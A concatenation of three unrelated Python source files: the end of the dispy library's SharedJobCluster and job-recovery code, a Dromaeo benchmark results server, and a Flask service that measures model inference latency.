""" self.close() if self._cluster: cluster, self._cluster = self._cluster, None cluster.shutdown() class SharedJobCluster(JobCluster): """SharedJobCluster should be used (instead of JobCluster) if two or more processes can simultaneously use dispy. In this case, 'dispyscheduler' must be running on a node and 'scheduler_node' parameter should be set to that node's IP address or host name. @scheduler_node is name or IP address where dispyscheduler is running to which jobs are submitted. @scheduler_port is port where dispyscheduler is running at @scheduler_node. @port is port where this client will get job results from dispyscheduler. @pulse_interval for SharedJobCluster is not used; instead, dispyscheduler must be called with appropriate pulse_interval. The behaviour is same as for JobCluster. """ def __init__(self, computation, nodes=None, depends=[], callback=None, cluster_status=None, ip_addr=None, port=51347, scheduler_node=None, scheduler_port=None, ext_ip_addr=None, loglevel=logger.INFO, setup=None, cleanup=True, dest_path=None, poll_interval=None, reentrant=False, exclusive=False, secret='', keyfile=None, certfile=None, recover_file=None): self.addrinfo = node_addrinfo(scheduler_node) self.scheduler_ip_addr = self.addrinfo.ip if not nodes: nodes = ['*'] elif not isinstance(nodes, list): if isinstance(nodes, str): nodes = [nodes] else: raise Exception('"nodes" must be list of IP addresses or host names') node_allocs = _parse_node_allocs(nodes) if not node_allocs: raise Exception('"nodes" argument is invalid') node_allocs = [(na.ip_addr, na.port, na.cpus) for na in node_allocs] if ext_ip_addr: ext_ip_addr = node_addrinfo(ext_ip_addr).ip JobCluster.__init__(self, computation, depends=depends, callback=callback, cluster_status=cluster_status, ip_addr=ip_addr, port=port, ext_ip_addr=ext_ip_addr, loglevel=loglevel, setup=setup, cleanup=cleanup, dest_path=dest_path, poll_interval=poll_interval, reentrant=reentrant, secret=secret, keyfile=keyfile, certfile=certfile, recover_file=recover_file) def _terminate_scheduler(self, task=None): yield self._cluster._sched_event.set() # wait for scheduler to terminate self._cluster.terminate = True Task(_terminate_scheduler, self).value() self._cluster._scheduler.value() self._cluster.job_uid = None if not scheduler_port: scheduler_port = 51349 # wait until tcp server has started while not self._cluster.port: time.sleep(0.1) sock = socket.socket(self.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, blocking=True, keyfile=keyfile, certfile=certfile) sock.connect((self.scheduler_ip_addr, scheduler_port)) sock.sendall(self._cluster.auth) req = {'version': _dispy_version, 'ip_addr': ext_ip_addr, 'scheduler_ip_addr': self.scheduler_ip_addr} sock.send_msg(b'CLIENT:' + serialize(req)) reply = sock.recv_msg() sock.close() reply = deserialize(reply) if reply['version'] != _dispy_version: raise Exception('dispyscheduler version "%s" is different from dispy version "%s"' % reply['version'], _dispy_version) ext_ip_addr = reply['ip_addr'] self.scheduler_port = reply['port'] self._scheduler_auth = auth_code(secret, reply['sign']) self._compute.scheduler_ip_addr = ext_ip_addr self._compute.scheduler_port = self._cluster.port self._compute.job_result_port = self._cluster.port sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=keyfile, certfile=certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute': self._compute, 'node_allocs': node_allocs, 'exclusive': bool(exclusive)} sock.send_msg(b'COMPUTE:' + serialize(req)) reply = sock.recv_msg() reply = deserialize(reply) if isinstance(reply, dict): self._compute.id = reply['compute_id'] self._compute.auth = reply['auth'] else: raise Exception('Scheduler refused computation: %s' % reply) except: raise finally: sock.close() for xf in self._compute.xfer_files: xf.compute_id = self._compute.id logger.debug('Sending file "%s"', xf.name) sock = socket.socket(self.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, blocking=True, keyfile=keyfile, certfile=certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) sock.send_msg(b'FILEXFER:' + serialize(xf)) recvd = sock.recv_msg() recvd = deserialize(recvd) sent = 0 with open(xf.name, 'rb') as fd: while sent == recvd: data = fd.read(1024000) if not data: break sock.sendall(data) sent += len(data) recvd = sock.recv_msg() recvd = deserialize(recvd) assert recvd == xf.stat_buf.st_size except: logger.error('Could not transfer %s to %s', xf.name, self.scheduler_ip_addr) # TODO: delete computation? sock.close() Task(self._cluster.add_cluster, self).value() self._scheduled_event = threading.Event() sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=keyfile, certfile=certfile) sock.settimeout(MsgTimeout) sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute_id': self._compute.id, 'auth': self._compute.auth} sock.send_msg(b'SCHEDULE:' + serialize(req)) resp = sock.recv_msg() sock.close() if resp == b'ACK': self._scheduled_event.wait() logger.debug('Computation %s created with %s', self._compute.name, self._compute.id) else: self._cluster._clusters.pop(self._compute.id, None) raise Exception('Computation "%s" could not be sent to scheduler' % self._compute.name) def submit(self, *args, **kwargs): """Submit a job for execution with the given arguments. Arguments should be serializable and should correspond to arguments for computation used when cluster is created. """ return self.submit_node(None, *args, **kwargs) def submit_node(self, node, *args, **kwargs): """Submit a job for execution at 'node' with the given arguments. 'node' can be an instance of DispyNode (e.g., as received in cluster/job status callback) or IP address or host name. Arguments should be serializable and should correspond to arguments for computation used when cluster is created. """ if node: if isinstance(node, DispyNode): node = node.ip_addr elif isinstance(node, str): node = _node_ipaddr(node) else: node = None if not node: return None if self._compute.type == _Compute.prog_type: args = [str(arg) for arg in args] try: _job = _DispyJob_(self._compute.id, args, kwargs) except: logger.warning('Creating job for "%s", "%s" failed with "%s"', str(args), str(kwargs), traceback.format_exc()) return None job = None try: for xf in _job.xfer_files: sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) sock.send_msg(b'FILEXFER:' + serialize(xf)) recvd = sock.recv_msg() recvd = deserialize(recvd) sent = 0 with open(xf.name, 'rb') as fd: while sent == recvd: data = fd.read(1024000) if not data: break sock.sendall(data) sent += len(data) recvd = sock.recv_msg() recvd = deserialize(recvd) assert recvd == xf.stat_buf.st_size sock.close() sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'node': node, 'job': _job, 'auth': self._compute.auth} sock.send_msg(b'JOB:' + serialize(req)) msg = sock.recv_msg() _job.uid = deserialize(msg) if _job.uid: self._cluster._sched_jobs[_job.uid] = _job self._pending_jobs += 1 self._complete.clear() sock.send_msg(b'ACK') if self.status_callback: self._cluster.worker_Q.put((self.status_callback, (DispyJob.Created, None, _job.job))) job = _job.job else: sock.send_msg('NAK'.encode()) _job.job._dispy_job_ = None del _job.job except: logger.warning('Creating job for "%s", "%s" failed with "%s"', str(args), str(kwargs), traceback.format_exc()) _job.job._dispy_job_ = None del _job.job finally: sock.close() return job def cancel(self, job): """Similar to 'cancel' of JobCluster. """ _job = job._dispy_job_ if _job is None or self._cluster._clusters.get(_job.compute_id, None) != self: logger.warning('Invalid job %s for cluster "%s"!', job.id, self._compute.name) return -1 if job.status not in [DispyJob.Created, DispyJob.Running, DispyJob.ProvisionalResult]: logger.warning('Job %s is not valid for cancel (%s)', job.id, job.status) return -1 job.status = DispyJob.Cancelled # assert self._pending_jobs >= 1 sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'uid': _job.uid, 'compute_id': self._compute.id, 'auth': self._compute.auth} sock.send_msg(b'TERMINATE_JOB:' + serialize(req)) except: logger.warning('Could not connect to scheduler to terminate job') return -1 finally: sock.close() return 0 def allocate_node(self, node_alloc): """Similar to 'allocate_node' of JobCluster. """ if not isinstance(node_alloc, list): node_alloc = [node_alloc] node_allocs = _parse_node_allocs(node_alloc) if not node_allocs: raise StopIteration(-1) if len(node_allocs) != 1: return -1 node_alloc = node_allocs[0] sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute_id': self._compute.id, 'auth': self._compute.auth, 'node_alloc': node_alloc} sock.send_msg(b'ALLOCATE_NODE:' + serialize(req)) reply = sock.recv_msg() reply = deserialize(reply) except: logger.warning('Could not connect to scheduler to add node') reply = -1 finally: sock.close() return reply def deallocate_node(self, node): """Similar to 'allocate_node' of JobCluster. """ if isinstance(node, DispyNode): node = node.ip_addr else: node = _node_ipaddr(node) if not node: return -1 sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute_id': self._compute.id, 'auth': self._compute.auth, 'node': node} sock.send_msg(b'DEALLOCATE_NODE:' + serialize(req)) reply = sock.recv_msg() reply = deserialize(reply) except: logger.warning('Could not connect to scheduler to add node') reply = -1 finally: sock.close() return reply def close_node(self, node, terminate_pending=False): """Similar to 'cloe_node' of JobCluster. """ if isinstance(node, DispyNode): node = node.ip_addr else: node = _node_ipaddr(node) if not node: return -1 sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute_id': self._compute.id, 'auth': self._compute.auth, 'node': node, 'terminate_pending': terminate_pending} sock.send_msg(b'CLOSE_NODE:' + serialize(req)) reply = sock.recv_msg() reply = deserialize(reply) except: logger.warning('Could not connect to scheduler to add node') reply = -1 finally: sock.close() return reply def node_jobs(self, node, from_node=False): """Similar to 'node_jobs' of JobCluster. """ if isinstance(node, DispyNode): node = node.ip_addr else: node = _node_ipaddr(node) if not node: return [] sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute_id': self._compute.id, 'auth': self._compute.auth, 'node': node, 'get_uids': True, 'from_node': bool(from_node)} sock.send_msg(b'NODE_JOBS:' + serialize(req)) reply = sock.recv_msg() job_uids = deserialize(reply) _jobs = [self._cluster._sched_jobs.get(uid, None) for uid in job_uids] except: logger.warning('Could not connect to scheduler to get running jobs at node') _jobs = [] finally: sock.close() jobs = [_job.job for _job in _jobs if _job] return jobs def set_node_cpus(self, node, cpus): """Similar to 'set_node_cpus' of JobCluster. """ sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute_id': self._compute.id, 'auth': self._compute.auth, 'node': node, 'cpus': cpus} sock.send_msg(b'SET_NODE_CPUS:' + serialize(req)) reply = sock.recv_msg() reply = deserialize(reply) except: logger.warning('Could not connect to scheduler to add node') return -1 finally: sock.close() return reply def send_file(self, path, node): """Send file with given 'path' to 'node'. 'node' can be an instance of DispyNode (e.g., as received in cluster status callback) or IP address or host name. """ if node: if isinstance(node, DispyNode): node = node.ip_addr elif isinstance(node, str): node = _node_ipaddr(node) else: node = None if not node: return -1 cwd = self._cluster.dest_path path = os.path.abspath(path) if path.startswith(cwd): dst = os.path.dirname(path[len(cwd):].lstrip(os.sep)) else: dst = '.' xf = _XferFile(path, dst, self._compute.id) sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=self._cluster.keyfile, certfile=self._cluster.certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) sock.send_msg(b'SENDFILE:' + serialize({'node': node, 'xf': xf})) recvd = sock.recv_msg() recvd = deserialize(recvd) sent = 0 with open(xf.name, 'rb') as fd: while sent == recvd: data = fd.read(1024000) if not data: break sock.sendall(data) sent += len(data) recvd = sock.recv_msg() recvd = deserialize(recvd) assert recvd == xf.stat_buf.st_size except: return -1 else: return 0 def recover_jobs(recover_file=None, timeout=None, terminate_pending=False): """ If dispy client crashes or loses connection to nodes, the nodes will continue to execute scheduled jobs. This 'recover_jobs' function can be used to retrieve the results of those jobs (DispyJob objects). @recover_file is path to file in which dispy stored information about cluster (see 'recover_file' in JobCluster above). If incorrect 'recover_file' is used, this function issues a warning and will block. @timeout is time limit in seconds for recovery. This function will return all jobs that finish before 'timeout'. Any jobs still running or couldn't be recovered before timeout will be ignored. @terminate_pending indicates if any jobs currently running should be terminated (so that, for example, node can be used for computations again right away instead of having to wait until all jobs finish). Returns list of DispyJob instances that will have .result, .stdout, .stderr etc.; however, the nodes don't keep track of .id, .args, .kwargs so they will be None. Once all the jobs that were scheduled at the time of crash are retrieved (if the jobs are still running, this function will block until all the jobs are finished and results obtained), nodes are closed (so they can serve new clients), 'recover_file' is removed and the jobs are returned. """ if not recover_file: import glob recover_file = sorted(glob.glob('_dispy_*')) if recover_file: recover_file = recover_file[-1] else: print('Could not find recover file of the form "_dispy_*"') return [] shelf_nodes = {} computes = {} cluster = None pycos_scheduler = pycos.Pycos.instance() try: shelf = shelve.open(recover_file, flag='r') except: print('Could not open recover file "%s"' % recover_file) return [] for key, val in shelf.items(): if key.startswith('node_'): shelf_nodes[key[len('node_'):]] = val elif key.startswith('compute_'): computes[int(key[len('compute_'):])] = val elif key == '_cluster': cluster = val else: logger.warning('Invalid key "%s" ignored', key) shelf.close() if not cluster or not computes or not shelf_nodes: for ext in ('', '.db', '.bak', '.dat', '.dir'): if os.path.isfile(recover_file + ext): try: os.remove(recover_file + ext) except: pass return [] nodes = {} for ip_addr, info in shelf_nodes.items(): node = _Node(ip_addr, info['port'], 0, '', cluster['secret'], platform='', keyfile=cluster['keyfile'], certfile=cluster['certfile']) node.auth = info['auth'] if info.get('scheduler'): node.scheduler_ip_addr = ip_addr nodes[node.ip_addr] = node def tcp_req(conn, addr, pending, task=None): # generator conn.settimeout(MsgTimeout) msg = yield conn.recv_msg() if msg.startswith(b'JOB_REPLY:'): try: reply = deserialize(msg[len(b'JOB_REPLY:'):]) except: logger.warning('Invalid job reply from %s:%s ignored', addr[0], addr[1]) conn.close() raise StopIteration yield conn.send_msg(b'ACK') logger.debug('Received reply for job %s', reply.uid) job = DispyJob((), {}) job.result = deserialize(reply.result) job.stdout = reply.stdout job.stderr = reply.stderr job.exception = reply.exception job.start_time = reply.start_time job.end_time = reply.end_time job.status = reply.status job.ip_addr = reply.ip_addr job.finish.set() pending['jobs'].append(job) pending['count'] -= 1 if pending['count'] == 0 and pending['resend_req_done'] is True: pending['complete'].set() else: logger.debug('Invalid TCP message from %s ignored', addr[0]) conn.close() def tcp_server(ip_addr, pending, task=None): task.set_daemon() addrinfo = node_addrinfo(ip_addr) sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_STREAM), keyfile=cluster['keyfile'], certfile=cluster['certfile']) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((ip_addr, cluster['port'])) sock.listen(32) while 1: if pending['timeout']: timeout = pending['timeout'] - (time.time() - pending['start_time']) if timeout <= 0: pending['complete'].set() timeout = 2 sock.settimeout(timeout) try: conn, addr = yield sock.accept() except ssl.SSLError as err: logger.debug('SSL connection failed: %s', str(err)) continue except GeneratorExit: break except socket.timeout: continue except: continue else: Task(tcp_req, conn, addr, pending) raise StopIteration def resend_requests(pending, task=None): for compute_id, compute in list(computes.items()): if pending['timeout'] and \ ((time.time() - pending['start_time']) > pending['timeout']): break req = {'compute_id': compute_id, 'auth': compute['auth']} for ip_addr in compute['nodes']: node = nodes.get(ip_addr, None) if not node: continue reply = yield node.send(b'RESEND_JOB_RESULTS:' + serialize(req)) try: reply = deserialize(reply) assert isinstance(reply, int) except: logger.warning('Invalid resend reply from %s', ip_addr) continue logger.debug('Pending jobs from %s for %s: %s', node.ip_addr, compute['name'], reply) if reply == 0: req['node_ip_addr'] = ip_addr yield node.send(b'CLOSE:' + serialize(req), reply=True, task=task) else: pending['count'] += reply pending['resend_req_done'] = True if pending['count'] == 0: pending['complete'].set() pending = {'count': 0, 'resend_req_done': False, 'jobs': [], 'complete': threading.Event(), 'timeout': timeout, 'start_time': time.time()} for ip_addr in cluster['ip_addrs']: if not ip_addr: ip_addr = '' Task(tcp_server, ip_addr, pending) Task(resend_requests, pending) pending['complete'].wait() for compute_id, compute in computes.items(): req = {'compute_id': compute_id, 'auth': compute['auth'], 'terminate_pending': terminate_pending} for ip_addr in compute['nodes']: node = nodes.get(ip_addr, None) if not node: continue if node.scheduler_ip_addr: continue req['node_ip_addr'] = ip_addr Task(node.send, b'CLOSE:' + serialize(req), reply=True) if terminate_pending: # wait a bit to get cancelled job results for x in range(10): if pending['count'] == 0 and pending['resend_req_done'] is True: break time.sleep(0.2) pycos_scheduler.finish() if pending['count'] == 0 and pending['resend_req_done'] is True: for ext in ('', '.db', '.bak', '.dat', '.dir'): if os.path.isfile(recover_file + ext): try: os.remove(recover_file + ext) except: pass return pending['jobs'] if __name__ == '__main__': import argparse logger.info('dispy version %s', _dispy_version) parser = argparse.ArgumentParser() parser.add_argument('computation', help='program to distribute and parallelize') parser.add_argument('-c', action='store_false', dest='cleanup', default=True, help='if True, nodes will remove any files transferred when ' 'this computation is over') parser.add_argument('-d', '--debug', action='store_true', dest='loglevel', default=False, help='if given, debug messages are printed') parser.add_argument('-a', action='append', dest='args', default=[], help='argument(s) to program; repeat for multiple instances') parser.add_argument('-f', action='append', dest='depends', default=[], help='dependencies (files) needed by program') parser.add_argument('-n', '--nodes', action='append', dest='nodes', default=[], help='list of nodes (names or IP address) acceptable for this computation') parser.add_argument('--ip_addr', dest='ip_addr', default=None, help='IP address of this client') parser.add_argument('--secret', dest='secret', default='', help='authentication secret for handshake with nodes') parser.add_argument('--certfile', dest='certfile', default='', help='file containing SSL certificate') parser.add_argument('--keyfile', dest='keyfile', default='', help='file containing SSL key') parser.add_argument('--scheduler_node', dest='scheduler_node', default=None, help='name or IP address where dispyscheduler is running to which ' 'jobs are submitted') config = vars(parser.parse_args(sys.argv[1:])) if config['loglevel']: logger.setLevel(logger.DEBUG) pycos.logger.setLevel(logger.DEBUG) else: logger.setLevel(logger.INFO) del config['loglevel'] if config['certfile']: config['certfile'] = os.path.abspath(config['certfile']) else: config['certfile'] = None if config['keyfile']: config['keyfile'] = os.path.abspath(config['keyfile']) else: config['keyfile'] = None args = config.pop('args') if config['scheduler_node']: cluster = SharedJobCluster(**config) else: del config['scheduler_node'] cluster = JobCluster(**config) jobs = [] for n, arg in enumerate(args, start=1): job = cluster.submit(*(arg.split())) job.id = n jobs.append((job, arg)) for job, args in jobs: job() sargs = ''.join(arg for arg in args) if job.exception: print('Job %s with arguments "%s" failed with "%s"' % (job.id, sargs, job.exception)) continue if job.result: print('Job %s with arguments "%s" exited with: "%s"' % (job.id, sargs, str(job.result))) if job.stdout: print('Job %s with arguments "%s" produced output: "%s"' % (job.id, sargs, job.stdout)) if job.stderr: print('Job %s with argumens "%s" produced error messages: "%s"' % (job.id, sargs, job.stderr)) cluster.print_status() exit(0)
dromaeo.py
#!python # Copyright 2013 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import optparse import sys import threading import urlparse import zip_http_server # The set of address values that map to 'localhost'. _LOCALHOST_ADDRESSES = (None, '', '0.0.0.0', '127.0.0.1') class RequestHandler(zip_http_server.ZipFileRequestHandler): """A request handler class that handles incoming JSON post requests by storing the metrics and shutting down the server.""" def do_POST(self): """A handler for the POST method.""" post_body = None try: # Read the posted content. content_len = int(self.headers.getheader('content-length')) post_body = self.rfile.read(content_len) # The json is packed into a data argument. data = urlparse.parse_qs(post_body)['data'][0] # Stash the metrics in the server. results = json.loads(data) self.server.SetResults(results) # Send back a plain-text version of the data. pretty_data = json.dumps(results, sort_keys=True, indent=2) self.send_response(200) self.send_header('Content-Type', 'text/plain') self.send_header('Content-Length', len(pretty_data)) self.end_headers() self.wfile.write(pretty_data) except Exception, error: message = str(error) self.send_response(400) self.send_header('Content-Type', 'text/plain') self.send_header('Content-Length', len(message)) self.end_headers() self.wfile.write(message) class DromaeoServer(zip_http_server.HTTPZipFileServer): """This class implements a runnable HTTP server that serves the dromaeo benchmark from a ZIP archive. """ def __init__(self, zip_file, address='', port=0, request_handler_class=None): # Use the default request handler if no over-ride is specified. if request_handler_class is None: request_handler_class = RequestHandler # Initialize the base class. server_address = (address, port) zip_http_server.HTTPZipFileServer.__init__( self, server_address, request_handler_class, zip_file) # The results and an event to track when they get set. self._results = None self._results_have_been_set = threading.Event() def Run(self): """Runs the HTTP server in a background thread.""" thread = threading.Thread(target=self.serve_forever) thread.daemon = True thread.start() def SetResults(self, results): """Stores the results of the benchmark and sets an event to notify any other thread waiting on the results. """ self._results = results self._results_have_been_set.set() def HasResults(self): """Returns true if the results have been set.""" return self._results is not None def GetResults(self): """Returns the results or None.""" return self._results def WaitForResults(self, timeout): """Blocks until results have been set, or the timeout duration elapses.""" self._results_have_been_set.wait(timeout) def Reset(self): """Resets the event notification of the results being set.""" self._results_have_been_set.clear() def GetUrl(self): """Returns the URL at which the dromaeo benchmark is running.""" address, port = self.server_address if address in _LOCALHOST_ADDRESSES: address = 'localhost' return 'http://%s:%d/?dom&automated&post_json' % (address, port) def FormatResultsAsText(self): """Prints a dromaeo result set in a nicely human readable format.""" if not self.HasResults(): return 'None' sorted_results = sorted(self._results.iteritems()) return '\n'.join(' %s : %s' % kv for kv in sorted_results) def main(argv): # Setup the argument parser. parser = optparse.OptionParser() parser.add_option('-a', '--address', default='', help='The address to bind.') parser.add_option('-p', '--port', type='int', default=0, help='The port to bind (by default, the server will ' 'randomly select an available port).') parser.add_option('-z', '--zip-file', default='./dramaeo.zip', help='The zipfile containing the dramaeo resources ' '(default: %default).') parser.add_option('-t', '--timeout', type='int', default=300, help='The maximum time to wait for results, in seconds' '(default: %default).') # Parse the arguments. options, extra = parser.parse_args(argv) if extra: parser.error('Unexpected arguments: %s' % extra) # Create the server. server = DromaeoServer(zip_file=options.zip_file, address=options.address, port=options.port) # Run the server in another thread. print "Starting dromaeo server." server.Run() print "URl: %s" % server.GetURL() try: server.WaitForResults(options.timeout) except KeyboardInterrupt: pass server.shutdown() # Print the results to the console. if not server.HasResults(): print "Timed out or interrupted while waiting for results." return 1 else: print server.FormatResultsAsText() if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
evaluate_service.py
# -*- coding: utf-8 -*- # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the terms of the MIT License. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # MIT License for more details. """The Evaluate Service of the service.""" from flask import Flask, request from flask_restful import Resource, Api import glob import multiprocessing import time import shutil try: from werkzeug import secure_filename except Exception: from werkzeug.utils import secure_filename from class_factory import ClassFactory from hardwares import * # noqa F401 import datetime import os import logging from config import ip_address, listen_port, optional_params, clean_interval import traceback app = Flask(__name__) api = Api(app) class Evaluate(Resource): """Evaluate Service for service.""" def __init__(self): self.current_path = os.path.dirname(os.path.abspath(__file__)) self.result = {"latency": "-1", "out_data": [], "status": "sucess", "timestamp": ""} def post(self): """Interface to response to the post request of the client.""" self.parse_paras() self.upload_files() self.hardware_instance = ClassFactory.get_cls(self.hardware)(optional_params) if self.reuse_model == "True": logging.warning("Reuse the model, no need to convert the model.") else: try: self.hardware_instance.convert_model(backend=self.backend, model=self.model, weight=self.weight, save_dir=self.share_dir, input_shape=self.input_shape, out_nodes=self.out_nodes) except Exception: self.result["status"] = "Model convert failed." logging.error("[ERROR] Model convert failed!") traceback.print_exc() try: latency_sum = 0 for repeat in range(self.repeat_times): latency, output = self.hardware_instance.inference(converted_model=self.share_dir, input_data=self.input_data) latency_sum += float(latency) self.result["latency"] = latency_sum / self.repeat_times self.result["out_data"] = output except Exception: self.result["status"] = "Inference failed." logging.error("[ERROR] Inference failed! ") traceback.print_exc() return self.result def parse_paras(self): """Parse the parameters in the request from the client.""" self.backend = request.form["backend"] self.hardware = request.form["hardware"] self.reuse_model = request.form["reuse_model"] self.job_id = request.form["job_id"] self.input_shape = request.form.get("input_shape", type=str, default="") self.out_nodes = request.form.get("out_nodes", type=str, default="") self.repeat_times = int(request.form.get("repeat_times")) def upload_files(self): """Upload the files from the client to the service.""" self.now_time = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f') self.result["timestamp"] = self.now_time logging.warning("The timestamp is {}.".format(self.now_time)) self.upload_file_path = os.path.join(self.current_path, "out", self.now_time) self.share_dir = os.path.join(self.current_path, "out", self.job_id) os.makedirs(self.upload_file_path) model_file = request.files.get("model_file") if model_file is not None: self.model = self.upload_file_path + "/" + secure_filename(model_file.filename) model_file.save(self.model) data_file = request.files.get("data_file") if data_file is not None: self.input_data = self.upload_file_path + "/" + secure_filename(data_file.filename) data_file.save(self.input_data) weight_file = request.files.get("weight_file") if weight_file is not None: self.weight = self.upload_file_path + "/" + secure_filename(weight_file.filename) weight_file.save(self.weight) else: self.weight = "" logging.warning("upload file sucess!") api.add_resource(Evaluate, '/') def _clean_data_path(): while True: _clean_time = time.time() - clean_interval _current_path = os.path.dirname(os.path.abspath(__file__)) folder_pattern = "{}/out/*".format(_current_path) folders = glob.glob(folder_pattern) for folder in folders: if os.path.isdir(folder) and os.path.getctime(folder) < _clean_time: logging.info("remove old folder: {}".format(folder)) try: shutil.rmtree(folder) except Exception: logging.warn("failed to remove {}".format(folder)) time.sleep(3600) if __name__ == '__main__': p = multiprocessing.Process(target=_clean_data_path, daemon=True) p.start() app.run(host=ip_address, port=listen_port, threaded=False)